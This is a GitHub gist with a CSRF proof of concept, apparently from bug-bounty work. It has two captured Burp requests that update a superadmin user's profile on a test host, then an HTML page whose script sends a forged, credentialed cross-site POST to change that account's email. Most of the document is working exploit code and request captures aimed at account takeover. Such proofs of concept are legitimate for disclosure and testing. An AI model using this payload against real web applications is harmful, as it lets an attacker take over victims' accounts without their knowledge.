Skip to content

Instantly share code, notes, and snippets.

@vj0shii

vj0shii/1. Initial.burp

Last active May 28, 2020 16:23
Show Gist options
  • Save vj0shii/e04a26eeb9d2bbe4c1fe3dd457a48c82 to your computer and use it in GitHub Desktop.
Save vj0shii/e04a26eeb9d2bbe4c1fe3dd457a48c82 to your computer and use it in GitHub Desktop.
Download ZIP
CSRF-email update
Raw
1. Initial.burp
POST /server/api/users/1 HTTP/1.1
Host: test.example.com
Connection: close
Content-Length: 2298
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0xsvHS604Lx0QVR
Origin: https://test.example.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://test.example.com/client/app/build/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Cookie: --COOKIES HERE--
------WebKitFormBoundaryY0xsvHS604Lx0QVR
Content-Disposition: form-data; name="model"
{"id":"1","client_id":null,"user_type":"superadmin","company_name":null,"first_name":"Test1","last_name":"test","address_1":null,"address_2":null,"city":null,"state":null,"zip":null,"phone":null,"email":"[email protected]","cluster_id":null,"external_user_id":null,"additional_details_1":null,"additional_details_2":null,"additional_details_3":null,"enable_io_tool_module":false,"enable_lead_management_module":false,"lead_notification_frequency":"real_time","has_light_logo":false,"has_dark_logo":false,"default_home_page":null,"io_tool_notification_frequency":null,"country":null,"timezone":null,"status":"active","hipaa_acknowledgement_timestamp":null,"creation_time":1590667071,"report_language":null,"last_login_timestamp":1590667155,"show_welcome_modal":true,"show_services_overview":"default","show_categories_overview":"default","role_id":null,"io_tool_role_id":null,"client_group_id":null,"reporting_profile_id":"1","client_name":null,"client_reporting_status":null,"cluster_name":null,"override_dashboard_page_ids":null,"role_name":null,"client_group_name":null,"reporting_profile_name":"Default Profile","user_image_id":"7163","user_image_metadata":{"asset_id":"9c356861ae9896fe449102b0ba4ec207","public_id":"test/lwlwwyjdvzpmwwnqnr4g","version":1590667197,"version_id":"bb39724d650bd6495eb44b8d845b989f","signature":"04db16438eb5c620e22aa692d0f946e2cf2d07cf","width":64,"height":64,"format":"png","resource_type":"image","created_at":"2020-05-28T11:59:57Z","tags":[],"bytes":341,"type":"upload","etag":"d6b69986122a6445c9614dcbe5ea83b1","placeholder":false,"url":"http://res.cloudinary.com/tapclicks/image/upload/v1590667197/test/lwlwwyjdvzpmwwnqnr4g.png","secure_url":"https://res.cloudinary.com/tapclicks/image/upload/v1590667197/test/lwlwwyjdvzpmwwnqnr4g.png"},"user_type_display":"Super Admin","display_name":"Test test","lead_notification_frequency_display":"Real Time","status_display":"Active","timegroup":"hourly","formatted_creation_time":"May 28, 2020 11:57 AM","formatted_last_login_timestamp":"May 28, 2020 11:59 AM","can_be_edited":true,"can_be_deleted":false,"can_be_copied":false,"can_be_deleted_tooltip":null,"user_id":"1"}
------WebKitFormBoundaryY0xsvHS604Lx0QVR--
Raw
2. Final.burp
POST /server/api/users/1 HTTP/1.1
Host: test.example.com
Connection: close
Content-Length: 281
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0xsvHS604Lx0QVR
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Cookie: --COOKIES HERE--
------WebKitFormBoundaryY0xsvHS604Lx0QVR
Content-Disposition: form-data; name="model"
{"id":"1","user_type":"superadmin","first_name":"Test1","last_name":"test","email":"[email protected]","status":"active","reporting_profile_id":"1"}
------WebKitFormBoundaryY0xsvHS604Lx0QVR--
Raw
3. CSRF-POC.html
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://test.example.com/server/api/users/1", true);
xhr.setRequestHeader("Accept", "application/json, text/plain, */*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,hi;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryY0xsvHS604Lx0QVR");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryY0xsvHS604Lx0QVR\r\n" +
'Content-Disposition: form-data; name="model"\r\n\r\n'+
'{"id":"1","user_type":"superadmin","first_name":"Test1","last_name":"test","email":"[email protected]","status":"active","reporting_profile_id":"1"}\r\n'+
"------WebKitFormBoundaryY0xsvHS604Lx0QVR--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment